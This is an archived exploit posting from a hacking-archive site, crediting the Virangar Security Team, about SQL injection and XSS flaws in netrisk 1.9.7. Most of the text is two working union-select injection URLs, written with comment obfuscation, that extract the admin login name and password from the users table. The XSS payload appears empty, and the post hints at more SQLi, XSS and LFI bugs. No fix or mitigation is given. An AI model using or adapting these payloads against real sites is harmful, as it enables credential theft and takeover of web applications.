AOH :: HP Unsorted N :: BX1316.HTM

netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)



netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)
netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)



           =0D
   ####################################################################=0D
   #                                                                  #=0D
   #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #=0D
   #                        (sql injection/xss)                       #           =0D
   ####################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.org=0D 
www.virangar.net=0D 
=0D
--------=0D
Discoverd By : virangar security team=0D
(hadihadi)=0D
---------------------------------=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra=0D
=0D
& all virangar members & all hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
------------------------------------=0D
=0D
vlues:=0D
=0D
1.sql injection:=0D
get admin login name:=0D
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*=0D 
---=0D
get admin pass:=0D
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*=0D 
########################=0D
2.xss:=0D
http://site.com/patch/index.php?page==0D 
=0D
########################=0D
NetRisk contains of  other sql injecton/xss/LFI  bugs in other pages ;)=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.